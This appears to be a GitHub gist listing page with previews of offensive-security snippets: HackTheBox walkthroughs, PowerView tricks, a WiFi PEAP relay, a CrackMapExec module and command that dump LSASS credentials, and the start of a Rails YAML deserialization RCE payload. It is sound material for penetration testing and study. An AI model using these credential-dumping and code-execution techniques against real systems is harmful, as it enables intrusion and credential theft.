Skip to content

Instantly share code, notes, and snippets.

View mpgn's full-sized avatar
Impose ta chance, serre ton bonheur et va vers ton risque.


Impose ta chance, serre ton bonheur et va vers ton risque.
View GitHub Profile
mpgn /
Last active April 17, 2024 17:04
NetExec vs Absolute

In progress

  1. First we get the domain name to edit our etc hosts file
netexec smb                                                          
SMB    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
  • Domain name: absolute.htb
  • Netbios name: DC
mpgn / Scrambled vs NetExec .md
Last active April 23, 2024 03:03
Scrambled vs NetExec for fun and profit by @mpgn_x64

Scrambled vs NetExec

Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will pass the web part where we get one username : ksimpson

# if true on powershell command or no error on reg query output you are infected !
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
mpgn /
Created November 2, 2020 11:01 — forked from 1mm0rt41PC/
Wifi easy PEAP relay
# Wifi easy PEAP relay
# Author: 1mm0rt41PC - -
# Ref:
# -
# -
# -
# -
mpgn / Blackfield vs NetExec .md
Last active April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
mpgn / PowerView-3.0-tricks.ps1
Created March 29, 2020 16:35 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
mpgn /
Created November 26, 2019 15:12
CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker


  • Copy in cme/modules and reinstall CrackMapExec python install
  • pip install neo4j


cme smb -d adsec.local -u jsnow -p Winter_is_coming_\! -M bloodhound_owned
mpgn /
Last active December 6, 2019 17:50
Procdump CME module that dump LSASS process and extract the result with pypykatz
  1. install pypykatz pip install pypykatz outisde your pipenv
  2. Add this file to cme/module/
  3. compile python install
  4. run cme smb -u Administrator -p P@ssword -M procdump


mpgn / railspwn.rb
Created March 18, 2019 21:21 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
class DeprecatedInstanceVariableProxy